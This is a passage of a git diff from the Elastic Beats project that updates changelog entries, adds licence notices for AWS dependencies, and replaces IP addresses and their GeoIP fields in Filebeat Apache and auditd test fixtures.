diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc
index e051fb3b7fab..12a161a42a13 100644
--- a/CHANGELOG.next.asciidoc
+++ b/CHANGELOG.next.asciidoc
@@ -27,7 +27,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d
 - add_docker_metadata processor: Replace usage of deprecated `process.ppid` field with `process.parent.pid`. {pull}28620[28620]
 - Use data streams instead of indices for storing events from Beats. {pull}28450[28450]
 - Remove option `setup.template.type` and always load composable template with data streams. {pull}28450[28450]
-- Remove several ILM options (`rollover_alias` and `pattern`) as data streams does not require index aliases. {pull}28450[28450] 
+- Remove several ILM options (`rollover_alias` and `pattern`) as data streams does not require index aliases. {pull}28450[28450]
 - Index template's default_fields setting is only populated with ECS fields. {pull}28596[28596] {issue}28215[28215]
 - Remove `auto` from the available options of `setup.ilm.enabled` and set the default value to `true`. {pull}28671[28671]
 - Remove deprecated `--template` and `--ilm-policy` flags. Use `--index-management` instead. {pull}28870[28870]
@@ -360,6 +360,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d
 - Improve error handling in aws-s3 input for malformed s3 notifications. {issue}28828[28828] {pull}28946[28946]
 - Add support for parsers on journald input {pull}29070[29070]
 - Add support in httpjson input for oAuth2ProviderDefault of password grant_type. {pull}29087[29087]
+- Add elapsed time information to `aws-s3` input errors and log messages. {pull}29328[29328]
 
 *Heartbeat*
 
@@ -389,6 +390,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d
 
 *Functionbeat*
 
+- Add support for AWS Kinesis record deaggregation {pull}28241[28241]
 
 *Winlogbeat*
 
diff --git a/NOTICE.txt b/NOTICE.txt
index 57d437d253ba..d9548c67fccb 100644
--- a/NOTICE.txt
+++ b/NOTICE.txt
@@ -2444,6 +2444,218 @@ Contents of probable licence file $GOMODCACHE/github.com/aws/aws-lambda-go@v1.13
 
 
 
+--------------------------------------------------------------------------------
+Dependency : github.com/aws/aws-sdk-go
+Version: v1.19.48
+Licence type (autodetected): Apache-2.0
+--------------------------------------------------------------------------------
+
+Contents of probable licence file $GOMODCACHE/github.com/aws/aws-sdk-go@v1.19.48/LICENSE.txt:
+
+
+                                 Apache License
+                           Version 2.0, January 2004
+                        http://www.apache.org/licenses/
+
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+      "License" shall mean the terms and conditions for use, reproduction,
+      and distribution as defined by Sections 1 through 9 of this document.
+
+      "Licensor" shall mean the copyright owner or entity authorized by
+      the copyright owner that is granting the License.
+
+      "Legal Entity" shall mean the union of the acting entity and all
+      other entities that control, are controlled by, or are under common
+      control with that entity. For the purposes of this definition,
+      "control" means (i) the power, direct or indirect, to cause the
+      direction or management of such entity, whether by contract or
+      otherwise, or (ii) ownership of fifty percent (50%) or more of the
+      outstanding shares, or (iii) beneficial ownership of such entity.
+
+      "You" (or "Your") shall mean an individual or Legal Entity
+      exercising permissions granted by this License.
+
+      "Source" form shall mean the preferred form for making modifications,
+      including but not limited to software source code, documentation
+      source, and configuration files.
+
+      "Object" form shall mean any form resulting from mechanical
+      transformation or translation of a Source form, including but
+      not limited to compiled object code, generated documentation,
+      and conversions to other media types.
+
+      "Work" shall mean the work of authorship, whether in Source or
+      Object form, made available under the License, as indicated by a
+      copyright notice that is included in or attached to the work
+      (an example is provided in the Appendix below).
+
+      "Derivative Works" shall mean any work, whether in Source or Object
+      form, that is based on (or derived from) the Work and for which the
+      editorial revisions, annotations, elaborations, or other modifications
+      represent, as a whole, an original work of authorship. For the purposes
+      of this License, Derivative Works shall not include works that remain
+      separable from, or merely link (or bind by name) to the interfaces of,
+      the Work and Derivative Works thereof.
+
+      "Contribution" shall mean any work of authorship, including
+      the original version of the Work and any modifications or additions
+      to that Work or Derivative Works thereof, that is intentionally
+      submitted to Licensor for inclusion in the Work by the copyright owner
+      or by an individual or Legal Entity authorized to submit on behalf of
+      the copyright owner. For the purposes of this definition, "submitted"
+      means any form of electronic, verbal, or written communication sent
+      to the Licensor or its representatives, including but not limited to
+      communication on electronic mailing lists, source code control systems,
+      and issue tracking systems that are managed by, or on behalf of, the
+      Licensor for the purpose of discussing and improving the Work, but
+      excluding communication that is conspicuously marked or otherwise
+      designated in writing by the copyright owner as "Not a Contribution."
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity
+      on behalf of whom a Contribution has been received by Licensor and
+      subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      copyright license to reproduce, prepare Derivative Works of,
+      publicly display, publicly perform, sublicense, and distribute the
+      Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      (except as stated in this section) patent license to make, have made,
+      use, offer to sell, sell, import, and otherwise transfer the Work,
+      where such license applies only to those patent claims licensable
+      by such Contributor that are necessarily infringed by their
+      Contribution(s) alone or by combination of their Contribution(s)
+      with the Work to which such Contribution(s) was submitted. If You
+      institute patent litigation against any entity (including a
+      cross-claim or counterclaim in a lawsuit) alleging that the Work
+      or a Contribution incorporated within the Work constitutes direct
+      or contributory patent infringement, then any patent licenses
+      granted to You under this License for that Work shall terminate
+      as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the
+      Work or Derivative Works thereof in any medium, with or without
+      modifications, and in Source or Object form, provided that You
+      meet the following conditions:
+
+      (a) You must give any other recipients of the Work or
+          Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices
+          stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works
+          that You distribute, all copyright, patent, trademark, and
+          attribution notices from the Source form of the Work,
+          excluding those notices that do not pertain to any part of
+          the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its
+          distribution, then any Derivative Works that You distribute must
+          include a readable copy of the attribution notices contained
+          within such NOTICE file, excluding those notices that do not
+          pertain to any part of the Derivative Works, in at least one
+          of the following places: within a NOTICE text file distributed
+          as part of the Derivative Works; within the Source form or
+          documentation, if provided along with the Derivative Works; or,
+          within a display generated by the Derivative Works, if and
+          wherever such third-party notices normally appear. The contents
+          of the NOTICE file are for informational purposes only and
+          do not modify the License. You may add Your own attribution
+          notices within Derivative Works that You distribute, alongside
+          or as an addendum to the NOTICE text from the Work, provided
+          that such additional attribution notices cannot be construed
+          as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and
+      may provide additional or different license terms and conditions
+      for use, reproduction, or distribution of Your modifications, or
+      for any such Derivative Works as a whole, provided Your use,
+      reproduction, and distribution of the Work otherwise complies with
+      the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise,
+      any Contribution intentionally submitted for inclusion in the Work
+      by You to the Licensor shall be under the terms and conditions of
+      this License, without any additional terms or conditions.
+      Notwithstanding the above, nothing herein shall supersede or modify
+      the terms of any separate license agreement you may have executed
+      with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade
+      names, trademarks, service marks, or product names of the Licensor,
+      except as required for reasonable and customary use in describing the
+      origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or
+      agreed to in writing, Licensor provides the Work (and each
+      Contributor provides its Contributions) on an "AS IS" BASIS,
+      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+      implied, including, without limitation, any warranties or conditions
+      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+      PARTICULAR PURPOSE. You are solely responsible for determining the
+      appropriateness of using or redistributing the Work and assume any
+      risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory,
+      whether in tort (including negligence), contract, or otherwise,
+      unless required by applicable law (such as deliberate and grossly
+      negligent acts) or agreed to in writing, shall any Contributor be
+      liable to You for damages, including any direct, indirect, special,
+      incidental, or consequential damages of any character arising as a
+      result of this License or out of the use or inability to use the
+      Work (including but not limited to damages for loss of goodwill,
+      work stoppage, computer failure or malfunction, or any and all
+      other commercial damages or losses), even if such Contributor
+      has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing
+      the Work or Derivative Works thereof, You may choose to offer,
+      and charge a fee for, acceptance of support, warranty, indemnity,
+      or other liability obligations and/or rights consistent with this
+      License. However, in accepting such obligations, You may act only
+      on Your own behalf and on Your sole responsibility, not on behalf
+      of any other Contributor, and only if You agree to indemnify,
+      defend, and hold each Contributor harmless for any liability
+      incurred by, or claims asserted against, such Contributor by reason
+      of your accepting any such warranty or additional liability.
+
+   END OF TERMS AND CONDITIONS
+
+   APPENDIX: How to apply the Apache License to your work.
+
+      To apply the Apache License to your work, attach the following
+      boilerplate notice, with the fields enclosed by brackets "[]"
+      replaced with your own identifying information. (Don't include
+      the brackets!)  The text should be enclosed in the appropriate
+      comment syntax for the file format. We also recommend that a
+      file or class name and description of purpose be included on the
+      same "printed page" as the copyright notice for easier
+      identification within third-party archives.
+
+   Copyright [yyyy] [name of copyright owner]
+
+   Licensed under the Apache License, Version 2.0 (the "License");
+   you may not use this file except in compliance with the License.
+   You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing, software
+   distributed under the License is distributed on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+   See the License for the specific language governing permissions and
+   limitations under the License.
+
+
 --------------------------------------------------------------------------------
 Dependency : github.com/aws/aws-sdk-go-v2
 Version: v0.24.0
@@ -2867,6 +3079,14 @@ Contents of probable licence file $GOMODCACHE/github.com/awslabs/goformation/v4@
    limitations under the License.
 
 
+--------------------------------------------------------------------------------
+Dependency : github.com/awslabs/kinesis-aggregation/go
+Version: v0.0.0-20200810181507-d352038274c0
+Licence type (autodetected): Apache-2.0
+--------------------------------------------------------------------------------
+
+No licence file provided.
+
 --------------------------------------------------------------------------------
 Dependency : github.com/blakesmith/ar
 Version: v0.0.0-20150311145944-8bd4349a67f2
diff --git a/dev-tools/notice/overrides.json b/dev-tools/notice/overrides.json
index 6e2e2a2f505a..a4e8a78e568f 100644
--- a/dev-tools/notice/overrides.json
+++ b/dev-tools/notice/overrides.json
@@ -12,4 +12,5 @@
 {"name": "github.com/pelletier/go-buffruneio", "licenceType": "MIT"}
 {"name": "github.com/urso/magetools", "licenceType": "Apache-2.0"}
 {"name": "kernel.org/pub/linux/libs/security/libcap/cap", "licenceType": "BSD-3-Clause", "note": "dual licensed as GPL-v2 and BSD"}
-{"name": "kernel.org/pub/linux/libs/security/libcap/psx", "licenceType": "BSD-3-Clause", "note": "dual licensed as GPL-v2 and BSD"}
\ No newline at end of file
+{"name": "kernel.org/pub/linux/libs/security/libcap/psx", "licenceType": "BSD-3-Clause", "note": "dual licensed as GPL-v2 and BSD"}
+{"name": "github.com/awslabs/kinesis-aggregation/go", "licenceType": "Apache-2.0", "url": "https://github.com/awslabs/kinesis-aggregation/blob/master/LICENSE.txt"}
diff --git a/filebeat/module/apache/access/test/darwin-2.4.23.log b/filebeat/module/apache/access/test/darwin-2.4.23.log
index 1498b23dedd3..6b1ba50b1776 100644
--- a/filebeat/module/apache/access/test/darwin-2.4.23.log
+++ b/filebeat/module/apache/access/test/darwin-2.4.23.log
@@ -1,6 +1,6 @@
 ::1 - - [26/Dec/2016:16:16:28 +0200] "GET / HTTP/1.1" 200 45
 ::1 - - [26/Dec/2016:16:16:29 +0200] "GET /favicon.ico HTTP/1.1" 404 209
 ::1 - - [26/Dec/2016:16:16:48 +0200] "-" 408 -
-77.179.66.156 - - [26/Dec/2016:18:23:35 +0200] "GET / HTTP/1.1" 200 45
-77.179.66.156 - - [26/Dec/2016:18:23:41 +0200] "GET /notfound HTTP/1.1" 404 206
-77.179.66.156 - - [26/Dec/2016:18:23:45 +0200] "GET /hmm HTTP/1.1" 404 201
+89.160.20.156 - - [26/Dec/2016:18:23:35 +0200] "GET / HTTP/1.1" 200 45
+89.160.20.156 - - [26/Dec/2016:18:23:41 +0200] "GET /notfound HTTP/1.1" 404 206
+89.160.20.156 - - [26/Dec/2016:18:23:45 +0200] "GET /hmm HTTP/1.1" 404 201
diff --git a/filebeat/module/apache/access/test/darwin-2.4.23.log-expected.json b/filebeat/module/apache/access/test/darwin-2.4.23.log-expected.json
index 468bfb9fdc9e..11555973684c 100644
--- a/filebeat/module/apache/access/test/darwin-2.4.23.log-expected.json
+++ b/filebeat/module/apache/access/test/darwin-2.4.23.log-expected.json
@@ -67,7 +67,7 @@
         "event.dataset": "apache.access",
         "event.kind": "event",
         "event.module": "apache",
-        "event.original": "77.179.66.156 - - [26/Dec/2016:18:23:35 +0200] \"GET / HTTP/1.1\" 200 45",
+        "event.original": "89.160.20.156 - - [26/Dec/2016:18:23:35 +0200] \"GET / HTTP/1.1\" 200 45",
         "event.outcome": "success",
         "fileset.name": "access",
         "http.request.method": "GET",
@@ -77,18 +77,18 @@
         "input.type": "log",
         "log.offset": 181,
         "service.type": "apache",
-        "source.address": "77.179.66.156",
-        "source.as.number": 6805,
-        "source.as.organization.name": "Telefonica Germany",
-        "source.geo.city_name": "Germersheim",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 49.2231,
-        "source.geo.location.lon": 8.3639,
-        "source.geo.region_iso_code": "DE-RP",
-        "source.geo.region_name": "Rheinland-Pfalz",
-        "source.ip": "77.179.66.156",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "url.original": "/",
         "url.path": "/",
         "user.name": "-"
@@ -99,7 +99,7 @@
         "event.dataset": "apache.access",
         "event.kind": "event",
         "event.module": "apache",
-        "event.original": "77.179.66.156 - - [26/Dec/2016:18:23:41 +0200] \"GET /notfound HTTP/1.1\" 404 206",
+        "event.original": "89.160.20.156 - - [26/Dec/2016:18:23:41 +0200] \"GET /notfound HTTP/1.1\" 404 206",
         "event.outcome": "failure",
         "fileset.name": "access",
         "http.request.method": "GET",
@@ -109,18 +109,18 @@
         "input.type": "log",
         "log.offset": 252,
         "service.type": "apache",
-        "source.address": "77.179.66.156",
-        "source.as.number": 6805,
-        "source.as.organization.name": "Telefonica Germany",
-        "source.geo.city_name": "Germersheim",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 49.2231,
-        "source.geo.location.lon": 8.3639,
-        "source.geo.region_iso_code": "DE-RP",
-        "source.geo.region_name": "Rheinland-Pfalz",
-        "source.ip": "77.179.66.156",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "url.original": "/notfound",
         "url.path": "/notfound",
         "user.name": "-"
@@ -131,7 +131,7 @@
         "event.dataset": "apache.access",
         "event.kind": "event",
         "event.module": "apache",
-        "event.original": "77.179.66.156 - - [26/Dec/2016:18:23:45 +0200] \"GET /hmm HTTP/1.1\" 404 201",
+        "event.original": "89.160.20.156 - - [26/Dec/2016:18:23:45 +0200] \"GET /hmm HTTP/1.1\" 404 201",
         "event.outcome": "failure",
         "fileset.name": "access",
         "http.request.method": "GET",
@@ -141,18 +141,18 @@
         "input.type": "log",
         "log.offset": 332,
         "service.type": "apache",
-        "source.address": "77.179.66.156",
-        "source.as.number": 6805,
-        "source.as.organization.name": "Telefonica Germany",
-        "source.geo.city_name": "Germersheim",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 49.2231,
-        "source.geo.location.lon": 8.3639,
-        "source.geo.region_iso_code": "DE-RP",
-        "source.geo.region_name": "Rheinland-Pfalz",
-        "source.ip": "77.179.66.156",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "url.original": "/hmm",
         "url.path": "/hmm",
         "user.name": "-"
diff --git a/filebeat/module/apache/access/test/ssl-request.log b/filebeat/module/apache/access/test/ssl-request.log
index 5b65e3235d52..ddb7235b9e22 100644
--- a/filebeat/module/apache/access/test/ssl-request.log
+++ b/filebeat/module/apache/access/test/ssl-request.log
@@ -1,2 +1,2 @@
 [10/Aug/2018:09:45:56 +0200] 172.30.0.119 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET /nagiosxi/ajaxhelper.php?cmd=getxicoreajax&opts=%7B%22func%22%3A%22get_admin_tasks_html%22%2C%22args%22%3A%22%22%7D&nsp=b5c7d5d4b6f7d0cf0c92f9cbdf737f6a5c838218425e6ae21 HTTP/1.1" 1375
-[16/Oct/2019:11:53:47 +0200] 11.19.0.217 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET /appl/ajaxhelper.php?cmd=getxicoreajax&opts=%7B%22func%22%3A%22get_pagetop_alert_content_html%22%2C%22args%22%3A%22%22%7D&nsp=c2700eab9797eda8a9f65a3ab17a6adbceccd60a6cca7708650a5923950d HTTP/1.1" -
+[16/Oct/2019:11:53:47 +0200] 81.2.69.143 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET /appl/ajaxhelper.php?cmd=getxicoreajax&opts=%7B%22func%22%3A%22get_pagetop_alert_content_html%22%2C%22args%22%3A%22%22%7D&nsp=c2700eab9797eda8a9f65a3ab17a6adbceccd60a6cca7708650a5923950d HTTP/1.1" -
diff --git a/filebeat/module/apache/access/test/ssl-request.log-expected.json b/filebeat/module/apache/access/test/ssl-request.log-expected.json
index 6b4288724b18..61ced38ae636 100644
--- a/filebeat/module/apache/access/test/ssl-request.log-expected.json
+++ b/filebeat/module/apache/access/test/ssl-request.log-expected.json
@@ -33,20 +33,23 @@
         "event.dataset": "apache.access",
         "event.kind": "event",
         "event.module": "apache",
-        "event.original": "[16/Oct/2019:11:53:47 +0200] 11.19.0.217 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \"GET /appl/ajaxhelper.php?cmd=getxicoreajax&opts=%7B%22func%22%3A%22get_pagetop_alert_content_html%22%2C%22args%22%3A%22%22%7D&nsp=c2700eab9797eda8a9f65a3ab17a6adbceccd60a6cca7708650a5923950d HTTP/1.1\" -",
+        "event.original": "[16/Oct/2019:11:53:47 +0200] 81.2.69.143 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \"GET /appl/ajaxhelper.php?cmd=getxicoreajax&opts=%7B%22func%22%3A%22get_pagetop_alert_content_html%22%2C%22args%22%3A%22%22%7D&nsp=c2700eab9797eda8a9f65a3ab17a6adbceccd60a6cca7708650a5923950d HTTP/1.1\" -",
         "fileset.name": "access",
         "http.request.method": "GET",
         "http.version": "1.1",
         "input.type": "log",
         "log.offset": 276,
         "service.type": "apache",
-        "source.address": "11.19.0.217",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "11.19.0.217",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tls.cipher": "ECDHE-RSA-AES128-GCM-SHA256",
         "tls.version": "1.2",
         "tls.version_protocol": "tls",
diff --git a/filebeat/module/apache/error/test/sublevel.log-expected.json b/filebeat/module/apache/error/test/sublevel.log-expected.json
index 26ad0e275386..43ed49a67c50 100644
--- a/filebeat/module/apache/error/test/sublevel.log-expected.json
+++ b/filebeat/module/apache/error/test/sublevel.log-expected.json
@@ -18,4 +18,4 @@
         "process.thread.id": 140413273032448,
         "service.type": "apache"
     }
-]
+]
\ No newline at end of file
diff --git a/filebeat/module/apache/error/test/test.log b/filebeat/module/apache/error/test/test.log
index de56f84779dc..c8229f797156 100644
--- a/filebeat/module/apache/error/test/test.log
+++ b/filebeat/module/apache/error/test/test.log
@@ -1,4 +1,4 @@
 [Mon Dec 26 16:22:08 2016] [error] [client 192.168.33.1] File does not exist: /var/www/favicon.ico
 [Mon Dec 26 16:15:55.103786 2016] [core:notice] [pid 11379] AH00094: Command line: '/usr/local/Cellar/httpd24/2.4.23_2/bin/httpd'
-[Fri Sep 09 10:42:29.902022 2011] [core:error] [pid 35708:tid 4328636416] [client 72.15.99.187] File does not exist: /usr/local/apache2/htdocs/favicon.ico
-[Thu Jun 27 06:58:09.169510 2019] [include:warn] [pid 15934] [client 123.123.123.123:12345] AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html
+[Fri Sep 09 10:42:29.902022 2011] [core:error] [pid 35708:tid 4328636416] [client 89.160.20.112] File does not exist: /usr/local/apache2/htdocs/favicon.ico
+[Thu Jun 27 06:58:09.169510 2019] [include:warn] [pid 15934] [client 67.43.156.12:12345] AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html
diff --git a/filebeat/module/apache/error/test/test.log-expected.json b/filebeat/module/apache/error/test/test.log-expected.json
index 6bbb6067469b..38854b87a2ef 100644
--- a/filebeat/module/apache/error/test/test.log-expected.json
+++ b/filebeat/module/apache/error/test/test.log-expected.json
@@ -43,7 +43,7 @@
         "event.dataset": "apache.error",
         "event.kind": "event",
         "event.module": "apache",
-        "event.original": "[Fri Sep 09 10:42:29.902022 2011] [core:error] [pid 35708:tid 4328636416] [client 72.15.99.187] File does not exist: /usr/local/apache2/htdocs/favicon.ico",
+        "event.original": "[Fri Sep 09 10:42:29.902022 2011] [core:error] [pid 35708:tid 4328636416] [client 89.160.20.112] File does not exist: /usr/local/apache2/htdocs/favicon.ico",
         "event.timezone": "-02:00",
         "event.type": "error",
         "file.path": "/usr/local/apache2/htdocs/favicon.ico",
@@ -55,18 +55,18 @@
         "process.pid": 35708,
         "process.thread.id": 4328636416,
         "service.type": "apache",
-        "source.address": "72.15.99.187",
-        "source.as.number": 11693,
-        "source.as.organization.name": "WideOpenWest Finance LLC",
-        "source.geo.city_name": "Newnan",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 33.3708,
-        "source.geo.location.lon": -84.8154,
-        "source.geo.region_iso_code": "US-GA",
-        "source.geo.region_name": "Georgia",
-        "source.ip": "72.15.99.187"
+        "source.address": "89.160.20.112",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112"
     },
     {
         "@timestamp": "2019-06-27T06:58:09.169-02:00",
@@ -75,28 +75,24 @@
         "event.dataset": "apache.error",
         "event.kind": "event",
         "event.module": "apache",
-        "event.original": "[Thu Jun 27 06:58:09.169510 2019] [include:warn] [pid 15934] [client 123.123.123.123:12345] AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html",
+        "event.original": "[Thu Jun 27 06:58:09.169510 2019] [include:warn] [pid 15934] [client 67.43.156.12:12345] AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html",
         "event.timezone": "-02:00",
         "event.type": "error",
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "warn",
-        "log.offset": 384,
+        "log.offset": 385,
         "message": "AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html",
         "process.pid": 15934,
         "service.type": "apache",
-        "source.address": "123.123.123.123",
-        "source.as.number": 4808,
-        "source.as.organization.name": "China Unicom Beijing Province Network",
-        "source.geo.city_name": "Beijing",
+        "source.address": "67.43.156.12",
+        "source.as.number": 35908,
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 39.9288,
-        "source.geo.location.lon": 116.3889,
-        "source.geo.region_iso_code": "CN-BJ",
-        "source.geo.region_name": "Beijing",
-        "source.ip": "123.123.123.123",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.port": "12345"
     }
 ]
\ No newline at end of file
diff --git a/filebeat/module/auditd/log/test/audit-rhel6.log b/filebeat/module/auditd/log/test/audit-rhel6.log
index dceee8427109..9de386df73bc 100644
--- a/filebeat/module/auditd/log/test/audit-rhel6.log
+++ b/filebeat/module/auditd/log/test/audit-rhel6.log
@@ -6,7 +6,7 @@ type=USER_START msg=audit(1489519256.193:19600331): user pid=4151 uid=0 auid=700
 type=MAC_IPSEC_EVENT msg=audit(1489519382.529:19600354): op=SPD-add auid=4294967295 ses=4294967295 res=1 src=10.100.0.0 src_prefixlen=16 dst=10.100.4.0 dst_prefixlen=22
 type=SYSCALL msg=audit(1489519382.529:19600354): arch=c000003e syscall=44 success=yes exit=184 a0=9 a1=7f564ee6d2a0 a2=b8 a3=0 items=0 ppid=1240 pid=1275 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="charon" exe=2F7573722F6C6962657865632F7374726F6E677377616E2F636861726F6E202864656C6574656429 key=(null)
 type=LOGIN msg=audit(1489636960.072:19623791): pid=28281 uid=0 old auid=700 new auid=700 old ses=6793 new ses=12286
-type=CRYPTO_KEY_USER msg=audit(1489636960.070:19623788): user pid=28281 uid=0 auid=700 ses=6793 msg='op=destroy kind=session fp=? direction=both spid=28282 suid=74 rport=58994 laddr=107.170.139.210 lport=50022  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=USER_AUTH msg=audit(1489636960.072:19623789): user pid=28281 uid=0 auid=700 ses=6793 msg='op=success acct="admin" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=ssh res=success'
+type=CRYPTO_KEY_USER msg=audit(1489636960.070:19623788): user pid=28281 uid=0 auid=700 ses=6793 msg='op=destroy kind=session fp=? direction=both spid=28282 suid=74 rport=58994 laddr=107.170.139.210 lport=50022  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=USER_AUTH msg=audit(1489636960.072:19623789): user pid=28281 uid=0 auid=700 ses=6793 msg='op=success acct="admin" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=ssh res=success'
 type=USER_AUTH msg=audit(1489636977.804:19623807): user pid=28395 uid=0 auid=700 ses=12286 msg='op=PAM:authentication acct="root" exe="/bin/su" hostname=? addr=? terminal=pts/0 res=success'
 type=USER_ACCT msg=audit(1489636977.805:19623808): user pid=28395 uid=0 auid=700 ses=12286 msg='op=PAM:accounting acct="root" exe="/bin/su" hostname=? addr=? terminal=pts/0 res=success'
diff --git a/filebeat/module/auditd/log/test/audit-rhel6.log-expected.json b/filebeat/module/auditd/log/test/audit-rhel6.log-expected.json
index 7a1ba951e3b6..f7eb39a6d14d 100644
--- a/filebeat/module/auditd/log/test/audit-rhel6.log-expected.json
+++ b/filebeat/module/auditd/log/test/audit-rhel6.log-expected.json
@@ -278,7 +278,7 @@
         "event.dataset": "auditd.log",
         "event.kind": "event",
         "event.module": "auditd",
-        "event.original": "type=CRYPTO_KEY_USER msg=audit(1489636960.070:19623788): user pid=28281 uid=0 auid=700 ses=6793 msg='op=destroy kind=session fp=? direction=both spid=28282 suid=74 rport=58994 laddr=107.170.139.210 lport=50022  exe=\"/usr/sbin/sshd\" hostname=? addr=96.241.146.97 terminal=? res=success'",
+        "event.original": "type=CRYPTO_KEY_USER msg=audit(1489636960.070:19623788): user pid=28281 uid=0 auid=700 ses=6793 msg='op=destroy kind=session fp=? direction=both spid=28282 suid=74 rport=58994 laddr=107.170.139.210 lport=50022  exe=\"/usr/sbin/sshd\" hostname=? addr=216.160.83.61 terminal=? res=success'",
         "event.outcome": "success",
         "event.type": [
             "info"
@@ -289,18 +289,17 @@
